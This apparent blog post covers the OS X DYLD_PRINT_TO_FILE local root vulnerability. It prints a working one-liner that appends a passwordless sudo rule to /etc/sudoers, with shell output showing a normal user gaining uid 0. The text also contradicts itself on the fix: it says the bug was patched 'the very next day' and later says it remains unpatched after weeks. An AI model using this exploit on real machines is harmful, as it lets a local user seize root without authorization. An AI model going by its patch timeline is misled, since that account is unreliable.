Several weeks ago, a vulnerability in Apple’s logging implementation was discovered by Stefan Esser (known for the jailbreaks of your IOS devices). At the time of writing it remained unpatched, but Apple shipped a fix the very next day in OS X 10.10.5 (tracked as CVE-2015-3760) via improved environment sanitisation, so the exploit below no longer works on patched or modern macOS.
It’s trivially simple to get a root account, once you have a normal system account on a Mac OSX system.
By default, sudo is protected by your account password.
$ sudo su -
Password:
However, if you abuse the DYLD_PRINT_TO_FILE vulnerability, you instantly get root.
$ id
uid=1390866408(mattias)
$ DYLD_PRINT_TO_FILE=/etc/sudoers newgrp <<< 'echo "$USER ALL=(ALL) NOPASSWD:ALL" >&3'; sudo -s
$ id
uid=0(root) gid=0(wheel)
A single one-liner that elevates your privileges and bypasses sudo altogether.
It’s one thing that this happened. It’s software, we expect bugs. It’s quite another that this problem still isn’t patched after weeks of the exploit being known in the wild.